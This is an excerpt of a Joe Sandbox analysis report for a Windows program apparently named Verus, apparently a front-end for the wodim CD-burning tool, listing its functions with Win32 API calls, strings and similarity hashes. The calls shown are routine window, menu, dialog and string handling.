_memset.LIBCMT ref: 004329BE
GetMenuItemInfoW.USER32 ref: 004329E3
SetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 00432A10

Strings

,, xrefs: 004329CF
,, xrefs: 00432973

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemMenu$Info_memset$Default
String ID: ,$,
API String ID: 3163428234-220654547
Opcode ID: a9672014eb71bdcd4d53be404796684ae2111187c53f7e54ab5f1f0fff3b13c5
Instruction ID: dcb5489cdd8bbf50df74b7b7cca1d55f464aa103b879c2b0baf175b96c4b3000
Opcode Fuzzy Hash: a9672014eb71bdcd4d53be404796684ae2111187c53f7e54ab5f1f0fff3b13c5
Instruction Fuzzy Hash: 53218CB1104341ABE314DF15DD49B9BBBE8EF88750F20592DFA90922E0D3B8D508CB9A

Function 00436AC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 49stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(TLL,004C4C54), ref: 00436AF3
lstrcatW.KERNEL32(005396DC,005396DC), ref: 00436B09
lstrcatW.KERNEL32(?,wodim.exe), ref: 00436B15
lstrcatW.KERNEL32 ref: 00436B2B

Strings

wodim.exe, xrefs: 00436B0B
TLL, xrefs: 00436ADD, 00436AE1
" -devices, xrefs: 00436B17

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$lstrcpy
String ID: " -devices$TLL$wodim.exe
API String ID: 2482611188-3444456355
Opcode ID: 3f94c71c318ddd5439a74532e40374a6b5c1537f3a6b796e6e644bf6d0c83afd
Instruction ID: 4537328ba6c6e409149857837824ca57b6cee95f281786dc2fe93776ca740385
Opcode Fuzzy Hash: 3f94c71c318ddd5439a74532e40374a6b5c1537f3a6b796e6e644bf6d0c83afd
Instruction Fuzzy Hash: 7C0108B52003046FD360DB24D896FAF7BE4EFC8320F80491EF5AD43181DA786008CB9A

Function 0044E960 Relevance: 12.1, APIs: 8, Instructions: 110windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 0044E978
WindowFromPoint.USER32(?,00000000), ref: 0044E9A9
ScreenToClient.USER32(?,?), ref: 0044E9BD
SendMessageW.USER32(?,00000445,00000000,?), ref: 0044E9D2
GetMenuItemCount.USER32(?), ref: 0044EA02
PostMessageW.USER32(00000000,00000202,00000000,?), ref: 0044EA85
PostMessageW.USER32(00000000,00000100,0000001B,00000000), ref: 0044EA91
ScreenToClient.USER32(?,?), ref: 0044EAA5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$ClientPostScreen$CountFromItemMenuPointSendWindow
String ID:
API String ID: 3718463368-0
Opcode ID: 50ae2264f9206361cf4f766a0f6a30ddd215d40fdd9efb1bf9753a0e1ce42357
Instruction ID: 993eab9e321f5f8fc9d2a046f97e7ba1e270da0814de23847dc08ab46193c490
Opcode Fuzzy Hash: 50ae2264f9206361cf4f766a0f6a30ddd215d40fdd9efb1bf9753a0e1ce42357
Instruction Fuzzy Hash: 9F41BD71504341AFE314CF25D884B6BBBE4BBC8310F008A2EF995D7281D774E948CBAA

Function 0046CC90 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000044A), ref: 0046CCA1
GetWindowRect.USER32(00000000,?), ref: 0046CCAD
ScreenToClient.USER32(?,?), ref: 0046CCC2
ScreenToClient.USER32(?,?), ref: 0046CCD1
SendMessageW.USER32(?,00000430,00000000,?), ref: 0046CD2F
SendMessageW.USER32(?,0000041E,00000014,00000000), ref: 0046CD3D
SendMessageW.USER32(00000000,0000043A,00000000,00000000), ref: 0046CD7C
SetWindowPos.USER32(?,00000000,?,-00000004,?,00000000,00000000,?,0000041E,00000014,00000000,?,00000430,00000000,?), ref: 0046CD9D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientScreenWindow$ItemRect
String ID:
API String ID: 715094304-0
Opcode ID: e299a74838edbf6506358a066235eee8c812d97b9a733220f242b2c26eb8e615
Instruction ID: 18003454085287bd534279ba5019fc42704b4ee6fc41c13d23a0c8bb3bb1e440
Opcode Fuzzy Hash: e299a74838edbf6506358a066235eee8c812d97b9a733220f242b2c26eb8e615
Instruction Fuzzy Hash: FE3164B1344305BFE614DB65CD96F5BB7A9EBC8B04F10850CB645DB2D0D7B4E8018BA9

Function 0041CE70 Relevance: 12.1, APIs: 8, Instructions: 73windowtimeCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041CE89
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0041CE97
GetParent.USER32(?), ref: 0041CE9F
SendMessageW.USER32(00000000,00008000,00000000,00000000), ref: 0041CEAE
KillTimer.USER32(?,0000002A,-00000048,00000000,00000000), ref: 0041CEE9
SetTimer.USER32(?,0000002A,000003E8,00000000), ref: 0041CEFC

Part of subcall function 0041CD90: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CDB4
Part of subcall function 0041CD90: SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CDCC
Part of subcall function 0041CD90: SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CDDB
Part of subcall function 0041CD90: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CDEA
Part of subcall function 0041CD90: SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CE02
Part of subcall function 0041CD90: SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CE11
Part of subcall function 0041CD90: EnableWindow.USER32(?), ref: 0041CE21
Part of subcall function 0041CD90: EnableWindow.USER32(?), ref: 0041CE28
Part of subcall function 0041CD90: GetParent.USER32(?), ref: 0041CE2E
Part of subcall function 0041CD90: GetDlgItem.USER32(00000000,00000001), ref: 0041CE3E
Part of subcall function 0041CD90: EnableWindow.USER32(00000000), ref: 0041CE41
Part of subcall function 0041CD90: GetDlgItem.USER32(?,00000416), ref: 0041CE4C
Part of subcall function 0041CD90: EnableWindow.USER32(00000000), ref: 0041CE50
Part of subcall function 0041CD90: GetDlgItem.USER32(?,00000418), ref: 0041CE5B
Part of subcall function 0041CD90: EnableWindow.USER32(00000000), ref: 0041CE5F

GetDlgItem.USER32(?,0000041C), ref: 0041CF12
EnableWindow.USER32(00000000,?), ref: 0041CF23

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$EnableWindow$Item$ParentTimer$Kill
String ID:
API String ID: 851888589-0
Opcode ID: f63d265b501083c6fc45a087df81b60e1e438be38f563d014ae34dd3bb0b3008
Instruction ID: f8c34d89352b497c8d585fe601e7705baaa75cce76ee327d085cb9e3e02ac050
Opcode Fuzzy Hash: f63d265b501083c6fc45a087df81b60e1e438be38f563d014ae34dd3bb0b3008
Instruction Fuzzy Hash: 2911D6753407007BD2249BA6DD99F2B73ADEBC8B01F00491DB7469B3C1CAB8E800872C

Function 0041B040 Relevance: 12.1, APIs: 8, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,0000041F), ref: 0041B053
IsDlgButtonChecked.USER32(?,00000420), ref: 0041B06A
IsDlgButtonChecked.USER32(?,00000421), ref: 0041B080
IsDlgButtonChecked.USER32(?,00000422), ref: 0041B097
IsDlgButtonChecked.USER32(?,00000423), ref: 0041B0AE
IsDlgButtonChecked.USER32(?,00000424), ref: 0041B0C4
IsDlgButtonChecked.USER32(?,00000425), ref: 0041B0DB
SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0041B0F6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonChecked$MessageSend
String ID:
API String ID: 1665913100-0
Opcode ID: e23560d02c6bd1bd13d0547642e0103ee99320f2c6d4ab868a8ef1d06e4305ff
Instruction ID: bf238e511e5fd4fb3b936fa17ebc17d3acc93f4fba4f2b46a880a67e39305e2a
Opcode Fuzzy Hash: e23560d02c6bd1bd13d0547642e0103ee99320f2c6d4ab868a8ef1d06e4305ff
Instruction Fuzzy Hash: C411777B6043C06BC211E774ADD0E9B7B54ABA4A40F148838F345DB2E2C5A5F545CB29

Function 0045EA71 Relevance: 12.0, APIs: 8, Instructions: 48windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,000000D8), ref: 0045EA88
ImageList_Create.COMCTL32(00000010,00000010,00000020,00000000,00000006), ref: 0045EA9A
ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0045EAA7
DeleteObject.GDI32(00000000), ref: 0045EAAE
LoadBitmapW.USER32(?,000000D9), ref: 0045EAC3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000000,00000006), ref: 0045EAD5
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0045EAE5
DeleteObject.GDI32(00000000), ref: 0045EAEC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ImageList_$BitmapCreateDeleteLoadObject$Masked
String ID:
API String ID: 185868847-0
Opcode ID: 0bf8c86b32b31bcb0f43d077d6c6ac1d16bfa628c3c415c4250b916530fbfa12
Instruction ID: 7b970e55f4bb361a86f4267beba0761ca5094281963c5a02e9d48516fd6858b0
Opcode Fuzzy Hash: 0bf8c86b32b31bcb0f43d077d6c6ac1d16bfa628c3c415c4250b916530fbfa12
Instruction Fuzzy Hash: CC01443678031077D7605BB1BD1DFCA3AA8FB89751F010421B345EB1D0CBA5544497AD

Function 00472C80 Relevance: 10.9, APIs: 7, Instructions: 418stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,?,?), ref: 00472DE6
lstrcatW.KERNEL32(?,?), ref: 00472DF5
lstrcpyW.KERNEL32(?,?,?,?), ref: 00472F8F
lstrcatW.KERNEL32(?,?), ref: 00472F9E
lstrcpyW.KERNEL32(?,?,?,?), ref: 0047310C
lstrcatW.KERNEL32(?,?), ref: 0047311A
lstrcpyW.KERNEL32(?,00000000), ref: 00473133

Part of subcall function 004772B0: lstrlenW.KERNEL32(?,?,004730E1,?,AD5E0258,00000000,00539FD8,?,?), ref: 004772B6

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$lstrcat$_malloclstrlen
String ID:
API String ID: 3312172230-0
Opcode ID: d2bb2fe8d74c2395c4ab353f8dedbfa62d1db427f9ed1762f2f342bb18d49c57
Instruction ID: 2d75082fdbae6bab0b29bc2af68fe043bcefbb1851728eb5fd839f968a489926
Opcode Fuzzy Hash: d2bb2fe8d74c2395c4ab353f8dedbfa62d1db427f9ed1762f2f342bb18d49c57
Instruction Fuzzy Hash: F90281B15083819FC764DF64C981AEBB7E4BF88304F04896EF58D87252D774E944CBAA

Function 00440390 Relevance: 10.8, APIs: 7, Instructions: 250stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0043F3D0: lstrcmpiW.KERNEL32(?,00004008), ref: 0043F44E

lstrlenW.KERNEL32(?,?), ref: 00440477

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcmpilstrlen
String ID:
API String ID: 3649823140-0
Opcode ID: d5698a52237366b9faf0b643e2857f2507c895f3fd51a7c8b021b66516f53b39
Instruction ID: ca7a50c4470bc37a1f7125acbf511fd880a22d9dcf1967aa281ea2f282609fb6
Opcode Fuzzy Hash: d5698a52237366b9faf0b643e2857f2507c895f3fd51a7c8b021b66516f53b39
Instruction Fuzzy Hash: B991F7B1900245ABEB24DF55CC91BEE73B4EF98300F11452EFA0A97380E7789A54C7A9

Function 00422350 Relevance: 10.7, APIs: 7, Instructions: 194stringwindowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 004223AB

Part of subcall function 00421A50: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00421A86
Part of subcall function 00421A50: FlushInstructionCache.KERNEL32(00000000), ref: 00421A8D
Part of subcall function 00421A50: DialogBoxParamW.USER32(?,000000E1,000000E9,Function_000166E0,?), ref: 00421ABD

lstrcpyW.KERNEL32(?,?), ref: 004223D8
lstrcatW.KERNEL32(?,004C4E6C), ref: 004223F1
lstrcatW.KERNEL32(?,?), ref: 00422403
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004224A4
SendMessageW.USER32(?,0000104D,00000000,?), ref: 004224F0
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0042253B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$lstrcat$ActiveCacheCurrentDialogFlushInstructionParamProcessWindowlstrcpy
String ID:
API String ID: 224365454-0
Opcode ID: c0abfe042b8be4fec6d7ed7b944dae7cbd7fd5ed6a09da483a80ab21d6f668e4
Instruction ID: 8e842418274fa6dc60feae0f8285b1cae004e2c69b89d4328b2eeb9e39cd05c7
Opcode Fuzzy Hash: c0abfe042b8be4fec6d7ed7b944dae7cbd7fd5ed6a09da483a80ab21d6f668e4
Instruction Fuzzy Hash: 987191B1608301AFD760DF29D981B5BBBF4FF88714F504A2EF58987290D774A844CB5A

Function 00428870 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185stringwindowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,?,00000000,00000010), ref: 0042894D
MessageBoxW.USER32(00000000,?,00000000,00000010), ref: 0042899D
lstrcpyW.KERNEL32(?,004C4C54,?,?,?,?,00000000), ref: 00428A17
lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 00428A30
lstrcatW.KERNEL32(?,004C4C54,?,?,?,00000000), ref: 00428A3C

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

Strings

Warning: The command line is %d characters long. Trying to execute through shell., xrefs: 004289B4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Messagelstrcat$_vswprintf_slstrcpy
String ID: Warning: The command line is %d characters long. Trying to execute through shell.
API String ID: 2317673355-2309805133
Opcode ID: 260700bfc6876051f7a7b1122af2ca00772b18901d6635b1e5abc95de0deff3f
Instruction ID: 3e0baff73ed0c9ad008dff0357fbe1b40806948cede483bfbe46bd6bbd777a77
Opcode Fuzzy Hash: 260700bfc6876051f7a7b1122af2ca00772b18901d6635b1e5abc95de0deff3f
Instruction Fuzzy Hash: 6351EDB16053006BD260EB10EC42FAF77D8AB94714F40492FF59A922C1EE787508C7AB

Function 004705E0 Relevance: 10.7, APIs: 7, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,AD5E0258), ref: 0047063C
lstrcpyW.KERNEL32 ref: 004706EE
SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00004410), ref: 00470706
lstrcpyW.KERNEL32(?,?), ref: 00470729
lstrcpyW.KERNEL32(?,?), ref: 0047073E
lstrcatW.KERNEL32(?,?), ref: 0047074B
lstrcatW.KERNEL32(?,004CA150), ref: 00470753

Part of subcall function 0046E830: _memset.LIBCMT ref: 0046E869
Part of subcall function 0046E830: SendMessageW.USER32(?,00001132,00000000,?), ref: 0046E8CE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$lstrcat$FileInfoMessageSend_memsetlstrlen
String ID:
API String ID: 3537771178-0
Opcode ID: b26a38178364069c00d8e55204fac87f3790556aef5a72e619ee49b6a71c745f
Instruction ID: 178e70f5f47ca0870b5004ef9499f35ff524c797e4889a98f50280dc9bb611d2
Opcode Fuzzy Hash: b26a38178364069c00d8e55204fac87f3790556aef5a72e619ee49b6a71c745f
Instruction Fuzzy Hash: 4E519DB46043459FC754DF29C881E6BB7E9EBC8714F00492EF58997381DB78A805CB9A

Function 00416FA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00416FFC

Part of subcall function 00449E80: PropertySheetW.COMCTL32(?,74E2F860,?,00000000,00416D22,00000000), ref: 00449EB9

EnableWindow.USER32(?,00000000), ref: 00417030
IsWindow.USER32(?), ref: 0041708F
ShowWindow.USER32(?,00000001), ref: 004170AE
SetWindowTextW.USER32(?,00000000), ref: 004170C8

Strings

(HL, xrefs: 00417067, 0041706B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
